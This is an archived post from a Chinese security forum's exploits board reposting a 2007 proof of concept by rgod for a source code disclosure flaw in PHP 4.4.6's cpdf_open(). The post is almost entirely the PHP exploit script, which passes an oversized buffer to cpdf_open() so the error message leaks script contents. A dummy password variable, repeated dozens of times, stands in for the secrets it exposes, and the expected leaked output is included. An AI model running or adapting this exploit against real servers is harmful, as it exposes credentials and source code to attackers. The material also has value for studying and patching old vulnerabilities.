PHP 4.4.6 cpdf_open() Local Source Code Discslosure PoC(页 1) - 安全测试代码{ Exploits and Shellcode } - 邪恶八进制信息安全团队技术讨论组努力为祖国的信息安全撑起一片蓝天

pub!1c 2007-3-10 00:46

PHP 4.4.6 cpdf_open() Local Source Code Discslosure PoC

[code]<?php
  /*
  PHP 4.4.6 cpdf_open() source code disclosure poc
  by rgod
  site: [url]http://retrogod.altervista.org[/url]

  to be launched form the cli

  this will show as output something like this:

  ClibPDF: Cannot open [A * 11111]$my_password_is="suntzu";[newline]
  $my_password_is="suntzu";[etc...] for PDF output
  X-Powered-By: PHP/4.4.6
  Content-type: text/html

  I don't see some echo, and you? :)
  */

  if (!extension_loaded("pdf")){
die("you need the pdf extension loaded.");
  }
  $____buff=str_repeat('A',1111);

  $p=cpdf_open(1,$____buff);

  //some code with some information
  $my_password_is="suntzu";
  $my_password_is="suntzu";
  $my_password_is="suntzu";
  $my_password_is="suntzu";
  $my_password_is="suntzu";
  $my_password_is="suntzu";
  $my_password_is="suntzu";
  $my_password_is="suntzu";
  $my_password_is="suntzu";
  $my_password_is="suntzu";
  $my_password_is="suntzu";
  $my_password_is="suntzu";
  $my_password_is="suntzu";
  $my_password_is="suntzu";
  $my_password_is="suntzu";
  $my_password_is="suntzu";
  $my_password_is="suntzu";
  $my_password_is="suntzu";
  $my_password_is="suntzu";
  $my_password_is="suntzu";
  $my_password_is="suntzu";
  $my_password_is="suntzu";
  $my_password_is="suntzu";
  $my_password_is="suntzu";
  $my_password_is="suntzu";
  $my_password_is="suntzu";
  $my_password_is="suntzu";
  $my_password_is="suntzu";
  $my_password_is="suntzu";
  $my_password_is="suntzu";
  $my_password_is="suntzu";
  $my_password_is="suntzu";
  $my_password_is="suntzu";
  $my_password_is="suntzu";
  $my_password_is="suntzu";
  $my_password_is="suntzu";
  $my_password_is="suntzu";
  $my_password_is="suntzu";
  $my_password_is="suntzu";
  $my_password_is="suntzu";
  $my_password_is="suntzu";
  $my_password_is="suntzu";
  $my_password_is="suntzu";
  $my_password_is="suntzu";
  $my_password_is="suntzu";
  $my_password_is="suntzu";
  $my_password_is="suntzu";
  $my_password_is="suntzu";
  $my_password_is="suntzu";
  $my_password_is="suntzu";
  $my_password_is="suntzu";
  $my_password_is="suntzu";
  $my_password_is="suntzu";
  $my_password_is="suntzu";
  $my_password_is="suntzu";
  $my_password_is="suntzu";

?>
[/code]

页: [1]

邪恶八进制信息安全团队技术讨论组's Archiver

PHP 4.4.6 cpdf_open() Local Source Code Discslosure PoC